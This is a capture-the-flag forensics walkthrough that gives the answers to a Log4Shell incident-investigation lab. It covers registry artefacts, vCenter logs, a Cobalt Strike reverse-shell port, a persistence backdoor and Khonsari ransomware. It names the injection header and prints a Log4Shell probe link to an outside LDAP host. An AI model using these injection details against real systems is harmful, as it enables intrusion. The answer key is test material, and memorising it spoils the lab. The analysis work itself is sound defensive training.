DetectLog4j
For the last week, log4shell vulnerability has been gaining much attention not for its ability to execute arbitrary commands on the vulnerable system but for the wide range of products that depend on
Q1 What is the computer hostname?
for this challenge, I will use autopsy and fkt imager,
go-to operating system information and u will see the hostname in the right panel (note that your result may have some difference from mine as the file is still loading )
Answer: vcw65
Q2 What is the Timezone of the compromised machine?
we need to open the SYSTEM file to know the timezone
it will be at the following path: windows/system32/config
the system file would be on the right panel
we would search by Ftk imager this time till the autopsy completes its loading
export the file then load hive by registry editor.
go to the path: system\ControlSet001\Control\TimeZoneInformation to find the timezone
the time zone is pacific standard time, google it
Answer: UTC-8
Q3 What is the current build number on the system?
from the same path at Q2 for the system at ftk imager, scroll down for the SOFTWARE file and export it
load the hive using the registry editor and go to the path: software\Microsoft\Windows NT\CurrentVersion
Answer: 14393
Q4 What is the computer IP?
in the registry editor go to the path: system\ControlSet001\Services\Tcpip\Parameters\Interfaces{82e90056-fd8d-4a24-913a-fc46f535fddf}
Answer: 192.168.112.139
Q5 What is the domain computer was assigned to?
in the registry editor go to the path:
system\ControlSet001\Services\Tcpip\Parameters
Answer: cyberdefenders.org
Q6 When was myoussef user created?
now would use autopsy in the "Account" panel for the mentioned user time creation
Answer: 2021-12-28 06:57:23 utc
Q7 What is the user mhasan password hint?
from the same panel at Q6 "Account",
Answer: https://www.linkedin.com/in/0xmohamedhasan/
Q8 What is the version of the VMware product installed on the machine?
in the registry editor go to the path: software\VMware, Inc.\apacheTomcat
Another way using autopsy: from the installed programs :
Answer: 6.7.0.40322
Q9 What is the version of the log4j library used by the installed VMware product?
actually, I didn't know how to find the library path so I tried to search for it by name using Autopsy and fortunately, I found it
Answer: 2.11.2
Q10 What is the log4j library log level specified in the configuration file?
Search for log4j.properties and read the files till find their stat ..
Answer: INFO
Q11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?
By searching in Google, the header is x-forwarded-for
Answer: x-forwarded-for
Q12 The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?
in autopsy search for log4shell.huntress.com, and export the log file.
Answer: log4shell.huntress.com:1389/b1292f3c-a652-4240-8fb4-59c43141f55a
Q13 When was the first successful login to vsphere WebClient?
Search for audit_events at autopsy or go to the path: ProgramData\VMware\vCenterServer\runtime\VMwareSTSService\logs
then find the earlier Loginsuccess event.
Answer: 28/12/2021 20:39:29 UTC
Q14 What is the attacker's IP address?
from the same events, we could find the IP 192.168.112.128 tried many times to log in.
Answer: 192.168.112.128
Q15 What is the port the attacker used to receive the cobalt strike reverse shell?
search for PowerShell lunching logs, name : Microsoft-Windows-PowerShell%4Operational.evtx
then search for BASE64
useing cyberchef transform from base 64 and gunzip
use execute the code using Fakenet then analyze it by Wireshark.
Answer: 1337
Q16 What is the script name published by VMware to mitigate log4shell vulnerability?
Google it,
Answer:vc_log4j_mitigator.py
Q17 In some cases, you may not be able to update the products used in your network. What is the system property needed to set to 'true' to work around the log4shell vulnerability?
Again google it, then try both solutions :
log4j2.formatMsgNoLookups or the LOG4J_FORMAT_MSG_NO_LOOKUPS
Answer: log4j2.formatMsgNoLookups
Q18 What is the log4j version which contains a patch to CVE-2021-44228?
search for CVE-2021-44228 path
Answer: 2.15.0
Q19 Removing JNDIlookup.class may help in mitigating log4shell. What is the sha256 hash of the JNDILookup.class?
Search for JNDILookup.class and export the file,
then extract the file and search for JNDILookup.class
using HachMyFiles,
Answer: 0f038a1e0aa0aff76d66d1440c88a2b35a3d023ad8b2e3bac8e25a3208499f7e
Q20 Analyze JNDILookup.class. What is the value stored in the CONTAINER_JNDI_RESOURCE_PATH_PREFIX variable?
in Autopsy search for "CONTAINER_JNDI_RESOURCE_PATH_PREFIX"
Answer: java: comp/env/
Q21 What is the executable used by the attacker to gain persistence?
to find that we need to search for any startup program or executable file,
so search in the user's file for NTUSER.DAT
we will find it at the path: root\Users\Administrator.WIN-B633EO9K91M\NTUSER.DAT
export the file and open the hive using the registry editor
finally, search for any file with " Run ", we would find "RunOnce"
Answer: baaaackdooor.exe
Q22 When was the first submission of ransomware to virustotal?
after many searches, I found that the first ransomware submitted is "khonsari.exe"
then I searched for its analysis report.
Answer: 2021-12-11 22:57:01
Q24 What is the ISP that owns that IP that serves the text file?
from the previous virustotal report, the domain is Amazon
Answer: Amazon
Q25 The ransomware check for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?
from the article Khonsari ransomware analysis, we could see its behavior
Answer: ini
Hope that helps you, and thank you :)
Last updated